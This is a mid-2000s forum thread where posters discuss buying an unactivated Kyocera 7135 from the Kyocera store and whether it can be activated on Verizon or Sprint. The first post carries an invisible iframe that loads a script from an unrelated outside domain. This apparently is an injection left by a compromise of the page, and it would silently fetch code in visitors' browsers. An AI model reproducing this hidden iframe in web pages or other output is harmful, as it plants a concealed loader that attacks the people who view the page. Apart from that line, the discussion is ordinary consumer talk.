unactivated 7135's for sale on the Kyocera store for $649!
got an email directing me to the wireless phone store to buy an Alltel 7135. go here http://partner.getconnected.com/kyocera/. I tried zipcode 85008 in Arizona and clicked on phones only and voila! 2 -day shipping is $17.50 so you can have it by Christmas...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
If I were to buy an unactivated 7135 from the Kyocera store, does anyone know if I would be able to get it activated on Verizon before they even officially support the phone? For $100 more I would seriously consider buying it now rather than keep waiting for Verizon to sell it.
I live in AZ where they have Alltel stores, but (unfortunately? :violinist) I am vacationing in Hawaii thru mid Jan, and there are no Alltel stores here to visit a 7135. By the way I have 1XRTT service on my laptop and it is working great in Maui. I get between 60-110kbps here. Would be nice to get that kind of speed on a 7135 browser/email as well!
I can't believe I can order this phone with service in my old hometown in western NC, but I can't get the phone in Texas yet!! This is crazy... but I am visiting home for Christmas this week... Could I buy this phone with 'NO' Alltel plan back home, then bring it to TX with me to hook up on Sprint (are they using ens database on these?) or Verizon?

Can't seem to find anyone in Tampa who knows anything about availablity. I know I can order one on the website and get it by Monday, but my luck is that I would do that, then the AllTel Rep would call and say they JUST came in...
If you buy the phone from alltel, or anyone else, you won't be able to activate it on sprint unless you have someone on the inside, they won't add the ESN to their system.
Alot of people are asking if this phone for use on alltel could be used on the verizon network (or sprint network). I remember when I bought a motorola startac and called sprint to activate it, they walked me though a bunch of codes and stuff I had to put in the phone. I dont know if Sprint and/or Verizon still do this and this phone need codes entered but they probably wouldn't know what codes to give you if the phone isnt released yet on their network. I'm assuming the codes are model specific. Also, I thought if you bought a Sprint phone it simply wont work on Verizon, and vice-versa. That's why the free phone give-away here you have to say what network you want the phone for. So I see two possible issues with buying the alltel phone and activating it on another network...
Well, there are a few issues. You *should* (but don't necessarily take my word for it -- I don't work w/ Verizon, but I've done this before) be able to activate an alltel 7135 on Verizon, but not Sprint. Sprint won't let you use a phone unless its ESN (electronic serial number) is already in their database, meaning that the phone was manufactured for sprint and sold by Sprint. Verizon doesn't have that limitation. However, I doubt Verizon would allow you to insure the 7135 under their plan, which for me is a major issue.. so alas, I'll wait.
If we buy the unactivated 7135 from Kyocera store, I think we are buying it without any attachment to Alltel? (we would be buying from the "phones without plans" section. If that's true, then it is not a matter of switching an Alltel phone to Verizon/Sprint, but more a matter of being able to activate an unactivated phone on Verizon/Sprint that they do not yet officially support.
Dammittttt.....No stores in Phoenix have it yet...They have all told me Jan. If you buy it from Kyocera you can only get a 900 minute plan from Alltel at the current time!!!What gives????
I'm on Sprint but don't have any particular allegiance to them. If Sprint finally offers it, I won't get any discount anyway (right?) So I could buy a phone and see if Sprint will hook me up. If not, I can walk down the street to Verison and ask them. I'll just keep walking down the street until someone will hookup the phone. Worse case is that Verison comes out with it tomorrow with a discount for new losers and I would have missed that discount. Otherwise, eventually, Spint or someone will activate the phone.
Anyone see any holes in that stream of, er, um... "logic"?
